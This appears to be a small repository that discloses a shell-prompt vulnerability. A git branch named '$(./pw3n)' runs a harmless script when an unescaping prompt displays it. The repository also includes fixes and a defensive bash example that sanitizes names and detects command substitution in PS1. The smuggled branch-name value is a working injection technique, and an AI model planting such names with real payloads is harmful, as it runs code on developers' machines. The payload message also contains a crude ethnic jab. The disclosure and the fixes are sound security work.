├── README.md
└── pw3n

/README.md:
--------------------------------------------------------------------------------
# pw3nage

If you get pw3ned, might want to fix your shell

This is a rather silly POC of a vulnerability in custom shell prompt scripts that I suspect is rather widespread. I noticed
when working on a branch that included (for the sake of cuteness) a `$` that my prompt, which usually includes the branch
name, had a bunch of gibberish. I suspected the zsh plugin I was using did not properly escape shell metacharacters, so
I tried a few more things and landed on this.

How it works:

1. This repo has an unusually-named default branch of `$(./pw3n)`
2. The repo contains a script at the path referenced in the branch name
3. When you cd to this repo, if your shell prompt tries to display your branch name and doesn't correctly escape `$(..)` expressions, it will execute `./pw3n`

Fixes:

- only show whitelisted characters: `branch=${BRANCH//[^a-z0-9\/]/-}`
- construct PS1 to reference a variable that holds the branch name ([official git prompt fix](https://github.com/git/git/commit/8976500cbbb13270398d3b3e07a17b8cc7bff43f))

--------------------------------------------------------------------------------
/pw3n:
--------------------------------------------------------------------------------
#!/bin/bash

function pw3n_osx {
  say 'pawned you!'
  osascript -e 'tell app "Finder" to display dialog "Hacked by Chinese!"' >/dev/null 2>&1
}

function pw3n_other {
  echo 'pw3nd by git prompt' | wall
}

case "$OSTYPE" in
  darwin*) pw3n_osx;;
  *) pw3n_other;;
esac
--------------------------------------------------------------------------------
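The two fixes listed in the README, written out as prompt helpers in bash. This is an added example and not part of the pw3nage repo; the `pw3n_*` function names and the `PW3N_BRANCH` variable are my own.

```shell
#!/bin/bash
# Added example (not from the pw3nage repo): defensive handling of a git branch
# name in a bash prompt. Function and variable names here are hypothetical.

# Fix 1 from the README: whitelist. Every character outside [a-z0-9/] becomes
# '-', so the branch "$(./pw3n)" is rendered as "---/pw3n-" and no longer
# contains anything bash could parse as a command substitution. Note that this
# exact whitelist also replaces uppercase letters, as in the README's one-liner.
pw3n_sanitize_branch() {
  local branch="$1"
  printf '%s' "${branch//[^a-z0-9\/]/-}"
}

# Fix 2 from the README: never splice the branch text into PS1. Keep it in a
# variable and let PS1 reference that variable. Bash expands PS1 once, and the
# result of a parameter expansion is not re-scanned for $(...), so even an
# unsanitized name is displayed literally instead of being executed.
pw3n_set_branch() {
  PW3N_BRANCH="$1"
}

# Single quotes matter: the literal text '${PW3N_BRANCH}' goes into PS1, not
# the variable's current value.
pw3n_safe_ps1() {
  printf '%s' '[${PW3N_BRANCH}] '
}

# The vulnerable construction, shown only for contrast: the branch text itself
# is spliced into PS1, so PS1 now contains $(...) that bash evaluates on every
# prompt. This is the pattern the README's POC relies on.
pw3n_unsafe_ps1() {
  printf '%s' "[$1] "
}

# Audit helper: does a prompt string carry a command substitution that bash
# would run when it draws the prompt? Useful for checking what a prompt plugin
# actually put into PS1 (echo "$PS1" after cd-ing into a suspicious repo).
pw3n_prompt_has_cmdsub() {
  case "$1" in
    *'$('*|*'`'*) return 0 ;;
    *)            return 1 ;;
  esac
}
```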